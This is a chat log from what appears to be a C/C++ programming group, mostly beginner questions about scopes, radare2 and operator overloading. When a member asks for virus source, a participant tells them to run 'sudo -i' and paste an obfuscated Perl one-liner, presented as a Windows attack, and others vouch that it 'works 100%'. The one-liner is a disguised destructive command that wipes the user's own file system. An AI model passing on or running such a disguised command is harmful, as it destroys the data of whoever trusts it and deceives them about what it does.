Sercan
its just a trick question, to understand scopes i guess
Jussi
Maybe the compiler thinks you made an error there and tries to fix it for you..?
Jussi
No, if you define a new var as 20, and add 5, it should not end up as 30 :D
Sercan
we add 10 though, not 5
Jussi
Oh
Jussi
Then it is ok
Sercan
yea
Jussi
Sercan
i didnt really get his point anyway
Jussi
Yeah but the compiler treats the var in inner scope as different
Jussi
The new var I mean
Jussi
But I ask you to never write code like that 😄
Jussi
It will just confuse people
Sercan
I didn't even write the code lol, as i said it's just a dumb trick question that's supposed to """""teach""""" you the idea of scopes
Anonymous
Bus I think it print answer
Anonymous
Anonymous
So I think it print answer
35
10
Jussi
It is a stupid question, C suits to some needs better, and C++ to some other needa
Jussi
Needs*
Anonymous
Ok
Anonymous
LOL
Anonymous
Resources for learning radare2
Ariana
r2 is so hard to learn fully can quite useless tbh, could read like online documentation if you want to learn fully or theres something on their github cant rmb
Ariana
If you cant rmb something can always type ?
Naol
J
⠠⠍⠥⠓⠁⠍⠍⠁⠙⠽⠥⠎⠥⠋
🤔
Anonymous
Why report?
JAIMISH
This group is for learning coding languages not for advertizing anything....
Anonymous
Oh the ad was deleted
JAIMISH
Anonymous
Plz I want to learn C I am begging programming world then which easy way I learn coding c language
klimi
good thing is to know english... lots of tutorials are in english
Anonymous
OK plz send me
Anonymous
hey can anyone tell me "Can we send a mail in PHP from our localhost if Interne is enabled on the system ?"
Max
Anonymous
@all: how to track stolen android device?
Anonymous
i wanna find those piece of shits
klimi
this is c/c++ chat
Anonymous
What to learn at the beginning of c
Anonymous
hacking == security
Anonymous
see the pinned msg
Anonymous
Okk. Can anyone please give a source code of virus in C++ to paralyze window completely and show desired message after that..?
Dima
loooooooool
Dima
Anonymous
👍👍👍
Anonymous
Max
what it will do?
system call connects you to Windows machine and open shell for you. You can do a virus stuff there, like show message and other things.
Max
power of Kali linux, you know. it is like, you can first try to kick some commands and use it when needed.
why would else you install Kali, right? :)
Anonymous
Anonymous
Anonymous
Max
Anonymous
Dima
Dima
works 100%
Max
see @Landi58 ? @Neko_cpp tried and succeed
Anonymous
yeah isn't it caught by Window defender??
Anonymous
@forGGe
r35
Max
Anonymous
yeah..
Max
yeah..
which windows version you have?
Anonymous
window 10 64 bit but i have installed window 7 64 bit on virtual machine
Igor🇺🇦
i said direct link
How are you going to use it, if you can't even use search engine to find it? I mean it's not some rare software
Max
well, you can use Perl:
open shell in Kali and execute (for Windows 10 for example):
sudo -i
echo "\xA4\x7F\x7F\WINDOWS\x7F10\x7F64\x7FMICRO\x7FBUILD5888091.11\x11\xAB\xFF\x7F\xFF\xDE\x10" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`~{;;y; -/:-@[-`{|~};`-{/" *-;;s;;$_;see'
r35
Igor🇺🇦
Anonymous
Pre and post increment
Anonymous
What is the different between these two?
operator++();
operator++(int);
r35
Anonymous
Sorry to bother, I'm a developer looking for remote part-time jobs, backend and network programming is my main focus, also I can do simple frontend(react etc.). Thanks.
1
Anonymous
Anonymous
Is c++ useful in hacking purposes?